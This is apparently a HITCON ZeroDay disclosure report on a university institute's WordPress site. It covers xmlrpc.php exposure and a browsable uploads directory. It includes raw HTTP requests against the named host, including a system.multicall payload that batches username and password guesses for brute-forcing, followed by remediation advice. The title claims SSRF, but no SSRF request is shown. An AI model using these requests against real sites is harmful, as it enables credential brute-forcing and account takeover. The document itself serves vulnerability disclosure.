國立陽明交通大學生物医学资讯研究所 WordPress xmlrpc.php、 pingback.ping 服务器端请求伪造、多重调用(multicall)、 文件上传目录遍历 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2023-00456
  •  發信 Vendor: 國立陽明交通大學
  • Title: 國立陽明交通大學生物医学资讯研究所 WordPress xmlrpc.php、 pingback.ping 服务器端请求伪造、多重调用(multicall)、 文件上传目录遍历
  • Introduction: WordPress XMLRPC服务端请求伪造、目录遍历

處理狀態

目前狀態

公開
Last Update : 2023/11/01
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2023/09/01 15:03:42 : 新提交 (由 蹦蹦小圆帽 更新此狀態)
  • 2023/09/04 11:33:59 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2023/09/12 14:42:19 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2023/09/12 14:42:19 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2023/11/01 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2023-00456
  • 通報者:wanderer (蹦蹦小圆帽)
  • 風險:中
  • 類型:Server-Side Request Forgery (SSRF)

參考資料

暫無資料
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://bmi.ym.edu.tw/wp/xmlrpc.php
http://bmi.ym.edu.tw/wp/wp-content/uploads/

敘述

XML-RPC跨站请求伪造:

圖片圖片

网址:http://bmi.ym.edu.tw/wp/xmlrpc.php

请求方式:POST

请求包:

POST /wp/xmlrpc.php HTTP/1.1
Host: bmi.ym.edu.tw
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=2f7faa620ecc6e8a89b7ce5168bf47c2
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 93

<methodCall>
<methodName>system.listMethods</methodName>
<params>
</params>
</methodCall>

利用方式:

1)密码暴力破解:

POST /wp/xmlrpc.php HTTP/1.1
Host: bmi.ym.edu.tw
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=2f7faa620ecc6e8a89b7ce5168bf47c2
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 166

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>用户名</value></param>
<param><value>密码</value></param>
</params>
</methodCall>

*这里可以通过xmlrpc的system.multicall进行多重调用批量爆破,例如:

<methodCall>
  <methodName>system.multicall</methodName>
  <params><param>
    <value><array><data>
      <value><struct>
        <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
        <member><name>params</name><value><array><data>
          <value><string>admin</string></value>
          <value><string>admin888</string></value>
        </data></array></value></member>
      </struct></value>

      <value><struct>
        <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
        <member><name>params</name><value><array><data>
          <value><string>guest</string></value>
          <value><string>test</string></value>
        </data></array></value></member>
      </struct></value>
    </data></array></value>
  </param></params>
</methodCall>

Upload目录遍历:

网址:http://bmi.ym.edu.tw/wp/wp-content/uploads/

修補建議

禁用xml-rpc
更新到最新版本wordpress
设置文件目录权限
关闭apache文件浏览

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;